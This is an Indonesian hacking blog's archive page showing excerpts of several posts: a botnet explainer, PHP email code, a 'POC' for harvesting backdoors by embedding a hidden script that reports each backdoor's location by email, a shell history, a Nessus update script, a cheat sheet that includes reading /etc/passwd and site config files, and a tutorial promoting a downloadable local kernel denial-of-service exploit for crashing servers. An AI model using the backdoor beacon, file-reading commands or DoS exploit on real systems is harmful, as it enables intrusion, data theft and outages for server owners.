Archive for the ‘ Hacking ’ Category

Perburuan BotNet

Berbagai PC zombie yang dibajak adalah ancaman berbahaya bagi pengguna PC di Internet. CHIP akan tunjukkan, bagaimana memerangi botnet dan apa saja yang dapat Anda lakukan untuk menangkalnya.

A larm sebuah server di data center berbunyi. Ini berarti ada sebuah PC yang terinfeksi malware berhasil dideteksi. Hasil “investigasi” administrator dari penyedia layanan Internet menunjukkan bahwa PC yang terinfeksi tersebut adalah milik seorang pelanggan mereka. Prosedur selanjutnya adalah pelanggan tersebut diinformasikan dan risiko kea­manan tersebut pun berhasil disingkirkan. Demikian, sekilas rutinitas dalam perang melawan salah satu ancaman terbesar di Internet, botnet, yang merupakan sekumpulan PC yang telah berhasil dibajak dan dikendalikan hacker dari jauh (remote). Kini, banyak spam disebarluaskan melalui botnet. Serangan Denial-of-service (DoS) dan serangan hacker juga dilancarkan ke seluruh dunia melalui botnet. Ini mengesalkan pelanggan, meningkatkan biaya traffic bagi penyedia layanan, dan dapat melumpuhkan server pribadi maupun pemerintah. Continue reading

mengirim email dengan format html

Akhirnya ketemu juga, setelah menjelajah dunia maya yang bener2 maya dan gak jelas, source PHP untuk mengirim email dengan content html

biasanya untuk mengirim email dengan content text format source seperti ini

<?

//email pengirim

$from =”emailkita@domain.com”

//alamat email tujuan

$email = “emailtujuan@domain.com”;

//judul pesan
$subject = “judul”;

//content
$message = “isi email”;

//format pengiriman (dalam bentuk text)
$headers = “MIME-Version: 1.0” . “\r\n”;
$headers .= “Content-Type: text/plain; charset=iso-8859-1\n”;

mail($email, $subject, $message, $headers,$from);

?>

kalo kita ingin mengirim email dalam bentuk HTML  Continue reading

POC memanen ratusan backdoor

tadi setelah baca artikel nya om cruzen
http://forum.devilzc0de.org/thread-2239.html
ini hampir mirip dengan apa yang saya lakukan untuk mendapatkan fresh backdoor

bedanya kalo yang diterangkan om cruzen, dia menanam backdoor didalam script orang lain

nah kalo punya ane
ane pasang feedback di dalam backdoor
he2… tau kan siapa aja yang sering pakek bd

pertama kita membutuhkan script untuk feedback nya
yakni script yang memberitahukan lokasi backdoor berada


// untuk menyembunyikan error.
@error_reporting(0);
//subject
$sub="backdoor";
//pengirim email
$headers = "From: k3nz0 \n";
$headers .= "Content-Type: text/plain; charset=iso-8859-1\n";
//untuk menampilkan path dari file url Continue reading

Pencurian Script www.findtoyou.com oleh penyedia hosting www.stopanos.net

Pencurian Script http://www.findtoyou.com oleh penyedia hosting http://www.stopanos.net
By k1n9k0ng
Published: April 29, 2010
Updated: April 29, 2010

Sebelumnya kami menyewa disalah satu server sebagai VPS , kami menyewa disalah satu penyedia hosting http://www.stopanos.net , tapi mungkin dimanfaatkan oleh segelintir staff ataupun admin yang tidak bertanggung jawab mencuri source code dan database , untuk semua agar berhati-hati untuk tidak seperti ini , dan kami meminta pihak http://www.stopanos.net sebagai pihak yang bertanggung jawab atas duplikasi script http://www.findtoyou.com kami.

Berikut hasil link script kami yang diambil , dan kami punya bukti lebih kuat dari semua ini

POC :

779 free
780 free
781 top
782 free
783 top
784 free
785 top
786 ps ax
787 killall nginx
788 /usr/local/nginx/sbin/nginx
789 free
790 ps ax
791 shutdown -r now
792 /usr/local/nginx/sbin/nginx Continue reading

Update backtrack 3

#!/bin/sh
#
# Avoid using root’s TMPDIR
unset TMPDIR

Nessusplugins() {

read -p “Update Nessus Daemon? <y/n> ”
if [ “$REPLY” = “y” ];then
echo ———————————————
echo Nessus Plugins
echo
KIND=”Nessus Server”
echo -n $”Shutting down $KIND: ”
test -f /opt/nessus/var/nessus/nessus-service.pid && kill `cat /opt/nessus/var/nessus/nessus-service.pid`
RETVAL=$?
sleep 4
if [ “$RETVAL” == “0” ]; then
rm -f /var/lock/subsys/nessusd
echo services stopped successfully
else
echo services were not running…
fi
echo
echo -n “Updating $KIND plugins: ”
/opt/nessus/sbin/nessus-update-plugins
echo $KIND plugins updated successfully
echo -n $”Starting $KIND services: ”
/opt/nessus/sbin/nessus-service -D -a 127.0.0.1 –ipv4-only
echo $KIND services started… Continue reading

Shell Command

Catatan bila sewaktu-waktu di butuhkan ha2….

cat ./../mainfile.php = Config file.

ls -la = Lists directory’s.

ifconfig {eth0 etc} = Ipconfig equiv.

ps aux – Show running proccess’s.

gcc in_file -o out_file – Compile c file.

cat /etc/passwd – List’s accounts.

sudo – Superuser Do run a command as root provided you have perms
in /etc/sudoers. Continue reading

Kill Server with angela

this totorial to kill server with angela

required :
Local Kernel 2.6.x Denial Of Service Exploit with socket function and fork enabled
programmer : mywisdom (murder of odybx and cyber tank)
Download url: http://yoyoparty.com/upload/angela.tgz
Tested on:
– kernel 2.6.28
– kernel 2.6.21
– kernel 2.6.24 Continue reading